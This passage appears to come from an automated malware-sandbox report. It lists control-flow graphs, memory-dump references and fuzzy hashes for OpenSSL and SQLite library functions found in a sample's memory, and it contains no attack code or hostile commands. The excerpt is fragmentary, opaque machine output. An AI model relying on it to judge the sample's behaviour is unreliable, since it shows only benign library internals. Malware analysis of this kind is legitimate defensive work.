91849->91863 91851->91829 91852->91833 91854 7ffbaa58d2fe 91853->91854 91855 7ffbaa5862e0 new[] 14 API calls 91854->91855 91858 7ffbaa58d347 91854->91858 91856 7ffbaa58d313 91855->91856 91857 7ffbaa58d31b memset 91856->91857 91856->91858 91857->91858 91858->91845 91859->91845 91860->91845 91861->91845 91862->91849 91863->91848 91864 7ffbaa591490 GetSystemInfo 91865 7ffbaa5914c4 91864->91865
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: R_new$R_set_debug$X_get0_md$D_get_sizeR_get_modeX_get0_cipherX_get_iv_length
                                                                                                                                                                                                                                                                                                  • String ID: ..\s\ssl\record\rec_layer_s3.c$U$do_ssl3_write
                                                                                                                                                                                                                                                                                                  • API String ID: 2155623385-3398879041
                                                                                                                                                                                                                                                                                                  • Opcode ID: 41a00918063dcb1acd3d550392ff3b967aa5101fe27bfa6b86cdda5c14834b91
                                                                                                                                                                                                                                                                                                  • Instruction ID: c23f67a9386614f8fee94a529b017b9cf57a8f361c349dd272617e18a0751be3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41a00918063dcb1acd3d550392ff3b967aa5101fe27bfa6b86cdda5c14834b91
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62729FB2B0A68281EB629F35D444BB923A0FB45784F548236DE6D47BB9DFBDE540C700

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 484 7ffbab72cb40-7ffbab72cb43 485 7ffbab72cec5 484->485 486 7ffbab72cb49-7ffbab72cb6a call 7ffbab711325 484->486 489 7ffbab72cec0-7ffbab72cec4 486->489 490 7ffbab72cb70-7ffbab72cbdd call 7ffbab78c745 CRYPTO_free * 2 486->490 489->485 493 7ffbab72cbdf-7ffbab72cbe4 call 7ffbab711d9d 490->493 494 7ffbab72cbe9-7ffbab72cd29 CRYPTO_free_ex_data OPENSSL_LH_free X509_STORE_free CTLOG_STORE_free OPENSSL_sk_free * 3 call 7ffbab7111db OPENSSL_sk_pop_free * 3 OPENSSL_sk_free call 7ffbab711811 call 7ffbab711032 CRYPTO_free * 4 CRYPTO_secure_free 490->494 493->494 502 7ffbab72cd2b-7ffbab72cd36 EVP_MD_get0_provider 494->502 503 7ffbab72cd40-7ffbab72cd4a 494->503 502->503 504 7ffbab72cd38-7ffbab72cd3b EVP_MD_free 502->504 505 7ffbab72cd4c-7ffbab72cd57 EVP_MD_get0_provider 503->505 506 7ffbab72cd61-7ffbab72cd6e 503->506 504->503 505->506 507 7ffbab72cd59-7ffbab72cd5c EVP_MD_free 505->507 508 7ffbab72cd70-7ffbab72cd76 506->508 507->506 509 7ffbab72cd8d-7ffbab72cd95 508->509 510 7ffbab72cd78-7ffbab72cd83 EVP_CIPHER_get0_provider 508->510 509->508 512 7ffbab72cd97-7ffbab72cd9e 509->512 510->509 511 7ffbab72cd85-7ffbab72cd88 EVP_CIPHER_free 510->511 511->509 513 7ffbab72cda4-7ffbab72cdaa 512->513 514 7ffbab72cdac-7ffbab72cdb7 EVP_MD_get0_provider 513->514 515 7ffbab72cdc1-7ffbab72cdc9 513->515 514->515 516 7ffbab72cdb9-7ffbab72cdbc EVP_MD_free 514->516 515->513 517 7ffbab72cdcb-7ffbab72cddc 515->517 516->515 518 7ffbab72cdde 517->518 519 7ffbab72ce4a-7ffbab72cebb CRYPTO_free * 2 CRYPTO_THREAD_lock_free CRYPTO_free * 2 517->519 520 7ffbab72cde1-7ffbab72ce48 CRYPTO_free * 3 518->520 519->489 520->519 520->520
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: O_free$L_sk_free$D_freeD_get0_providerL_sk_pop_free$E_free$D_lock_freeH_freeO_free_ex_dataO_secure_freeR_freeR_get0_providerX509_
                                                                                                                                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                                                                                  • API String ID: 234229340-1080266419
                                                                                                                                                                                                                                                                                                  • Opcode ID: da6757feed0cf92b36d83c55165aa2a6c09c6b1f72b48f5c804d2acfe702e739
                                                                                                                                                                                                                                                                                                  • Instruction ID: 400d0d940be7949a0a66936f4f453e6d717838c00729fde14f26295e5edf3c8c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da6757feed0cf92b36d83c55165aa2a6c09c6b1f72b48f5c804d2acfe702e739
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD9178A2B1A64380EB43AF71D5912F83711EF85F84F049036DE2D4B6BADEADE541C350

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: O_malloc$O_freeR_newR_set_debug
                                                                                                                                                                                                                                                                                                  • String ID: ..\s\ssl\record\ssl3_buffer.c$ssl3_setup_read_buffer$ssl3_setup_write_buffer
                                                                                                                                                                                                                                                                                                  • API String ID: 2137838121-2302522825
                                                                                                                                                                                                                                                                                                  • Opcode ID: aff729ce5dbbfe64035964e2718b536c285c0b381943e99e5fe4dae49f62b85e
                                                                                                                                                                                                                                                                                                  • Instruction ID: f32ddfcf9d137356d5d5322755bb3c119b15f012568d7c3e124afe1abada13b6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aff729ce5dbbfe64035964e2718b536c285c0b381943e99e5fe4dae49f62b85e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B51D1B2B05B8182EB129B25E844BA977E4FB84B88F498535DE6C577B5CF7CD441C300

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 828 7ffbaa599060-7ffbaa5990eb 829 7ffbaa599244-7ffbaa59925a 828->829 830 7ffbaa5990f1-7ffbaa5990fb 828->830 831 7ffbaa599156-7ffbaa59919c call 7ffbaa5862e0 829->831 832 7ffbaa599260-7ffbaa599266 829->832 830->829 833 7ffbaa599101-7ffbaa599104 830->833 842 7ffbaa599839-7ffbaa59983c 831->842 843 7ffbaa5991a2-7ffbaa599206 memset 831->843 832->831 834 7ffbaa59926c-7ffbaa599282 call 7ffbaa5862e0 832->834 833->832 835 7ffbaa59910a 833->835 844 7ffbaa599288-7ffbaa5992a4 834->844 845 7ffbaa599899 834->845 838 7ffbaa599111-7ffbaa59911a 835->838 838->838 841 7ffbaa59911c-7ffbaa59912b call 7ffbaa5862e0 838->841 841->845 859 7ffbaa599131-7ffbaa599140 memcpy 841->859 842->845 847 7ffbaa59983e-7ffbaa599845 842->847 848 7ffbaa59920c-7ffbaa599228 memcpy 843->848 849 7ffbaa599441-7ffbaa59945c 843->849 866 7ffbaa5992a6-7ffbaa5992b3 844->866 867 7ffbaa5992ba 844->867 851 7ffbaa59989e-7ffbaa5998ae 845->851 852 7ffbaa599847-7ffbaa599851 847->852 853 7ffbaa599890 847->853 856 7ffbaa5993ec 848->856 857 7ffbaa59922e-7ffbaa59923f memcpy 848->857 854 7ffbaa5994be-7ffbaa5994d8 849->854 855 7ffbaa59945e-7ffbaa599461 849->855 863 7ffbaa599853 852->863 864 7ffbaa599859-7ffbaa599886 852->864 853->845 861 7ffbaa5995ee 854->861 862 7ffbaa5994de-7ffbaa5994e3 854->862 855->854 865 7ffbaa599463-7ffbaa59946a 855->865 860 7ffbaa5993ef-7ffbaa59943f memcpy * 2 856->860 857->860 868 7ffbaa599147-7ffbaa59914e 859->868 860->855 869 7ffbaa5995f3-7ffbaa599601 861->869 862->861 870 7ffbaa5994e9-7ffbaa599515 call 7ffbaa590250 862->870 863->864 864->845 891 7ffbaa599888-7ffbaa59988e 864->891 871 7ffbaa5994b5 865->871 872 7ffbaa59946c-7ffbaa599476 865->872 866->867 874 7ffbaa5992c1-7ffbaa5992c8 867->874 868->868 873 7ffbaa599150 868->873 875 7ffbaa599604-7ffbaa599607 869->875 882 7ffbaa599518-7ffbaa599538 870->882 871->854 876 7ffbaa599478 872->876 877 7ffbaa59947e-7ffbaa5994ab 872->877 873->831 874->874 879 7ffbaa5992ca-7ffbaa5992d8 874->879 880 7ffbaa5996b6-7ffbaa5996c0 875->880 881 7ffbaa59960d-7ffbaa599626 call 7ffbaa5985d0 875->881 876->877 877->854 907 7ffbaa5994ad-7ffbaa5994b3 877->907 887 7ffbaa5992e0-7ffbaa5992e7 879->887 885 7ffbaa5996ce-7ffbaa5996e1 call 7ffbaa594510 880->885 886 7ffbaa5996c2-7ffbaa5996cb 880->886 881->880 903 7ffbaa59962c-7ffbaa5996b0 881->903 889 7ffbaa5995e9-7ffbaa5995ec 882->889 890 7ffbaa59953e-7ffbaa599548 882->890 911 7ffbaa5996e7-7ffbaa5996f1 885->911 912 7ffbaa59982b-7ffbaa599837 885->912 886->885 887->887 893 7ffbaa5992e9-7ffbaa599300 887->893 889->875 895 7ffbaa59954a-7ffbaa59954c 890->895 896 7ffbaa59954e-7ffbaa599551 890->896 891->845 901 7ffbaa599357-7ffbaa59935e 893->901 902 7ffbaa599302-7ffbaa599306 893->902 897 7ffbaa599553-7ffbaa59955b 895->897 896->897 905 7ffbaa59955d-7ffbaa599571 call 7ffbaa597800 897->905 906 7ffbaa59957f-7ffbaa599595 call 7ffbaa643550 897->906 909 7ffbaa599383-7ffbaa59938a 901->909 910 7ffbaa599360-7ffbaa599368 901->910 913 7ffbaa599310-7ffbaa599317 902->913 924 7ffbaa599714-7ffbaa59971a 903->924 925 7ffbaa5996b2 903->925 905->906 938 7ffbaa599573-7ffbaa599578 905->938 939 7ffbaa599597-7ffbaa5995ab call 7ffbaa5fbff0 906->939 940 7ffbaa5995ad 906->940 907->854 918 7ffbaa59938c-7ffbaa599396 909->918 919 7ffbaa5993db 909->919 910->831 916 7ffbaa59936e-7ffbaa59937d call 7ffbaa6425d0 910->916 920 7ffbaa5996f3 911->920 921 7ffbaa5996f9-7ffbaa59970c 911->921 912->851 922 7ffbaa599320-7ffbaa599329 913->922 916->831 916->909 931 7ffbaa599398 918->931 932 7ffbaa59939e-7ffbaa5993cb 918->932 937 7ffbaa5993e4-7ffbaa5993e7 919->937 920->921 921->924 922->922 923 7ffbaa59932b-7ffbaa599339 922->923 933 7ffbaa599340-7ffbaa599349 923->933 934 7ffbaa599743-7ffbaa599753 924->934 935 7ffbaa59971c-7ffbaa59973f 924->935 925->880 931->932 932->937 957 7ffbaa5993cd-7ffbaa5993d6 932->957 933->933 942 7ffbaa59934b-7ffbaa599355 933->942 952 7ffbaa599755 934->952 953 7ffbaa59975b-7ffbaa59978c 934->953 935->934 937->851 938->906 945 7ffbaa5995af-7ffbaa5995b4 939->945 940->945 942->901 942->913 946 7ffbaa5995b6-7ffbaa5995cc call 7ffbaa643550 945->946 947 7ffbaa5995e1-7ffbaa5995e7 945->947 946->889 958 7ffbaa5995ce-7ffbaa5995df call 7ffbaa5fbff0 946->958 947->869 952->953 955 7ffbaa59978e-7ffbaa59979d 953->955 956 7ffbaa59979f-7ffbaa5997a6 953->956 959 7ffbaa5997aa-7ffbaa5997cc call 7ffbaa597800 955->959 956->959 957->851 958->889 958->947 965 7ffbaa5997d4-7ffbaa5997d7 959->965 966 7ffbaa5997ce-7ffbaa5997d2 959->966 968 7ffbaa5997d9-7ffbaa5997dc 965->968 969 7ffbaa5997de 965->969 967 7ffbaa5997e2-7ffbaa5997f4 966->967 970 7ffbaa5997f6-7ffbaa5997fd 967->970 971 7ffbaa5997ff-7ffbaa599811 967->971 968->967 968->969 969->967 972 7ffbaa599815-7ffbaa599829 970->972 971->972 972->851
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                  • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                                                                  • API String ID: 438689982-4201244970
                                                                                                                                                                                                                                                                                                  • Opcode ID: 380a9d1c4d3eb6c0978f43b2501ad74b92e3df7218d393616c9a4ef1ed7755b3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 505eaf89ec9b79b59a3132912262b26e49bf6b53b2c50c77395576157aca9511
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 380a9d1c4d3eb6c0978f43b2501ad74b92e3df7218d393616c9a4ef1ed7755b3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C3291A2A0A682C6EB528F35D88037D37A8FB45B94F085274CE5D0B7A4DF3DE446C724

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 974 7ffbaa5fb060-7ffbaa5fb08b 975 7ffbaa5fb096-7ffbaa5fb09c 974->975 976 7ffbaa5fb08d-7ffbaa5fb094 974->976 977 7ffbaa5fb100-7ffbaa5fb131 975->977 978 7ffbaa5fb09e-7ffbaa5fb0a0 975->978 979 7ffbaa5fb0b4-7ffbaa5fb0ff call 7ffbaa5894b0 * 2 976->979 983 7ffbaa5fb139-7ffbaa5fb144 977->983 984 7ffbaa5fb133 977->984 980 7ffbaa5fb0a2-7ffbaa5fb0ab 978->980 981 7ffbaa5fb0ad 978->981 980->979 980->981 981->979 986 7ffbaa5fb146-7ffbaa5fb150 call 7ffbaa58a2e0 983->986 987 7ffbaa5fb152-7ffbaa5fb159 983->987 984->983 988 7ffbaa5fb160-7ffbaa5fb166 986->988 987->988 991 7ffbaa5fb50d-7ffbaa5fb51a 988->991 992 7ffbaa5fb16c-7ffbaa5fb1aa call 7ffbaa603160 988->992 996 7ffbaa5fb535-7ffbaa5fb538 991->996 997 7ffbaa5fb51c-7ffbaa5fb523 991->997 1005 7ffbaa5fb50a 992->1005 1006 7ffbaa5fb1b0-7ffbaa5fb1b5 992->1006 1001 7ffbaa5fb53a-7ffbaa5fb540 call 7ffbaa586570 996->1001 1002 7ffbaa5fb545-7ffbaa5fb549 996->1002 999 7ffbaa5fb525-7ffbaa5fb528 call 7ffbaa5b4a40 997->999 1000 7ffbaa5fb52d-7ffbaa5fb530 call 7ffbaa5b4bb0 997->1000 999->1000 1000->996 1001->1002 1003 7ffbaa5fb5a7-7ffbaa5fb5b2 call 7ffbaa586e90 1002->1003 1004 7ffbaa5fb54b-7ffbaa5fb54e 1002->1004 1014 7ffbaa5fb5b4-7ffbaa5fb5bf 1003->1014 1004->1003 1010 7ffbaa5fb550-7ffbaa5fb552 1004->1010 1005->991 1011 7ffbaa5fb1b7-7ffbaa5fb1bc 1006->1011 1012 7ffbaa5fb1be-7ffbaa5fb1c0 1006->1012 1010->1014 1011->988 1015 7ffbaa5fb1c4-7ffbaa5fb1c9 call 7ffbaa5b7e80 1012->1015 1017 7ffbaa5fb5c1-7ffbaa5fb5c3 1014->1017 1018 7ffbaa5fb630-7ffbaa5fb646 1014->1018 1024 7ffbaa5fb1ce-7ffbaa5fb1d4 1015->1024 1020 7ffbaa5fb629 1017->1020 1021 7ffbaa5fb5c5-7ffbaa5fb5d3 call 7ffbaa6409d0 1017->1021 1022 7ffbaa5fb648 1018->1022 1023 7ffbaa5fb64e-7ffbaa5fb663 1018->1023 1020->1018 1034 7ffbaa5fb5da 1021->1034 1035 7ffbaa5fb5d5-7ffbaa5fb5d8 1021->1035 1022->1023 1026 7ffbaa5fb1da-7ffbaa5fb1dd 1024->1026 1027 7ffbaa5fb48f-7ffbaa5fb493 1024->1027 1030 7ffbaa5fb200-7ffbaa5fb202 1026->1030 1031 7ffbaa5fb1df-7ffbaa5fb1e2 1026->1031 1027->1015 1029 7ffbaa5fb499-7ffbaa5fb4a8 1027->1029 1036 7ffbaa5fb4aa-7ffbaa5fb4b2 call 7ffbaa5b4a40 1029->1036 1037 7ffbaa5fb4b5-7ffbaa5fb4dd call 7ffbaa5b4bb0 1029->1037 1032 7ffbaa5fb208-7ffbaa5fb210 1030->1032 1033 7ffbaa5fb28b-7ffbaa5fb299 1030->1033 1031->1029 1038 7ffbaa5fb1e8-7ffbaa5fb1ea 1031->1038 1039 7ffbaa5fb217 1032->1039 1040 7ffbaa5fb212-7ffbaa5fb215 1032->1040 1046 7ffbaa5fb458-7ffbaa5fb46c 1033->1046 1047 7ffbaa5fb29f 1033->1047 1042 7ffbaa5fb5e1-7ffbaa5fb5eb 1034->1042 1041 7ffbaa5fb615-7ffbaa5fb627 call 7ffbaa58a2e0 1035->1041 1036->1037 1061 7ffbaa5fb4f1-7ffbaa5fb4f4 1037->1061 1062 7ffbaa5fb4df 1037->1062 1038->1029 1045 7ffbaa5fb1f0-7ffbaa5fb1f8 1038->1045 1048 7ffbaa5fb21f-7ffbaa5fb239 call 7ffbaa5869f0 1039->1048 1040->1048 1041->1018 1042->1042 1050 7ffbaa5fb5ed-7ffbaa5fb5fc call 7ffbaa5862e0 1042->1050 1045->1029 1054 7ffbaa5fb1fe 1045->1054 1049 7ffbaa5fb474-7ffbaa5fb489 1046->1049 1055 7ffbaa5fb2a0-7ffbaa5fb2a8 1047->1055 1048->991 1075 7ffbaa5fb23f-7ffbaa5fb244 1048->1075 1049->1027 1076 7ffbaa5fb566-7ffbaa5fb578 1049->1076 1077 7ffbaa5fb5fe-7ffbaa5fb608 memcpy 1050->1077 1078 7ffbaa5fb60d-7ffbaa5fb613 1050->1078 1054->1032 1056 7ffbaa5fb2aa-7ffbaa5fb2b7 1055->1056 1057 7ffbaa5fb2fe 1055->1057 1064 7ffbaa5fb2b9 1056->1064 1065 7ffbaa5fb2bf-7ffbaa5fb2c9 1056->1065 1071 7ffbaa5fb305-7ffbaa5fb31a 1057->1071 1066 7ffbaa5fb4f6-7ffbaa5fb4fc call 7ffbaa586570 1061->1066 1067 7ffbaa5fb501-7ffbaa5fb504 1061->1067 1063 7ffbaa5fb4e0-7ffbaa5fb4ef 1062->1063 1063->1061 1063->1063 1064->1065 1073 7ffbaa5fb2ea-7ffbaa5fb2f9 call 7ffbaa58a2e0 1065->1073 1074 7ffbaa5fb2cb-7ffbaa5fb2d4 1065->1074 1066->1067 1067->988 1067->1005 1079 7ffbaa5fb328-7ffbaa5fb32b 1071->1079 1080 7ffbaa5fb31c-7ffbaa5fb320 1071->1080 1073->1057 1074->1073 1081 7ffbaa5fb2d6-7ffbaa5fb2d8 1074->1081 1084 7ffbaa5fb278-7ffbaa5fb285 1075->1084 1085 7ffbaa5fb246-7ffbaa5fb249 1075->1085 1082 7ffbaa5fb57a-7ffbaa5fb57d call 7ffbaa5b4a40 1076->1082 1083 7ffbaa5fb582-7ffbaa5fb5a2 call 7ffbaa5b4bb0 call 7ffbaa58a2e0 1076->1083 1077->1078 1078->1018 1078->1041 1088 7ffbaa5fb331-7ffbaa5fb338 call 7ffbaa5b0690 1079->1088 1089 7ffbaa5fb32d-7ffbaa5fb32f 1079->1089 1080->1079 1087 7ffbaa5fb322-7ffbaa5fb326 1080->1087 1081->1073 1092 7ffbaa5fb2da-7ffbaa5fb2e4 1081->1092 1082->1083 1083->991 1084->1033 1084->1049 1094 7ffbaa5fb250-7ffbaa5fb26e call 7ffbaa5b8f10 1085->1094 1090 7ffbaa5fb33b-7ffbaa5fb33e 1087->1090 1088->1090 1089->1090 1097 7ffbaa5fb340-7ffbaa5fb34a 1090->1097 1098 7ffbaa5fb36e-7ffbaa5fb375 1090->1098 1092->1071 1099 7ffbaa5fb2e6-7ffbaa5fb2e8 1092->1099 1110 7ffbaa5fb270 1094->1110 1102 7ffbaa5fb354 call 7ffbaa586e90 1097->1102 1103 7ffbaa5fb34c-7ffbaa5fb34e 1097->1103 1106 7ffbaa5fb44a-7ffbaa5fb452 1098->1106 1107 7ffbaa5fb37b-7ffbaa5fb383 1098->1107 1099->1097 1116 7ffbaa5fb359-7ffbaa5fb366 1102->1116 1103->1102 1108 7ffbaa5fb350-7ffbaa5fb352 1103->1108 1106->1046 1106->1055 1112 7ffbaa5fb385-7ffbaa5fb39e 1107->1112 1113 7ffbaa5fb3a3-7ffbaa5fb3b2 1107->1113 1108->1116 1110->1084 1117 7ffbaa5fb440-7ffbaa5fb444 1112->1117 1114 7ffbaa5fb3ba-7ffbaa5fb3c4 1113->1114 1115 7ffbaa5fb3b4 1113->1115 1119 7ffbaa5fb3c6-7ffbaa5fb3cf 1114->1119 1120 7ffbaa5fb3e1-7ffbaa5fb3f5 call 7ffbaa58a2e0 1114->1120 1115->1114 1116->1098 1121 7ffbaa5fb368 1116->1121 1117->1106 1118 7ffbaa5fb554-7ffbaa5fb564 call 7ffbaa586db0 1117->1118 1118->991 1119->1120 1123 7ffbaa5fb3d1-7ffbaa5fb3d3 1119->1123 1128 7ffbaa5fb3fc-7ffbaa5fb41c 1120->1128 1121->1098 1123->1120 1126 7ffbaa5fb3d5-7ffbaa5fb3df 1123->1126 1126->1128 1129 7ffbaa5fb426 call 7ffbaa586e90 1128->1129 1130 7ffbaa5fb41e-7ffbaa5fb420 1128->1130 1133 7ffbaa5fb42b-7ffbaa5fb438 1129->1133 1130->1129 1131 7ffbaa5fb422-7ffbaa5fb424 1130->1131 1131->1133 1133->1117 1134 7ffbaa5fb43a 1133->1134 1134->1117
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-3762325461
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5322917dae406af972ceb5c173cc7198a97aeeb3d07e19412ac7cbf5cc1b76b1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 08caeefa14be0c43185aa7b7f50e0645863c1143325f4fa9fedc23b87da07b34
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5322917dae406af972ceb5c173cc7198a97aeeb3d07e19412ac7cbf5cc1b76b1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0702DFA1A0AA42C9EB128B35E45037E77A9FF56B84F090171DE4E07695DF3DE44B8324
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
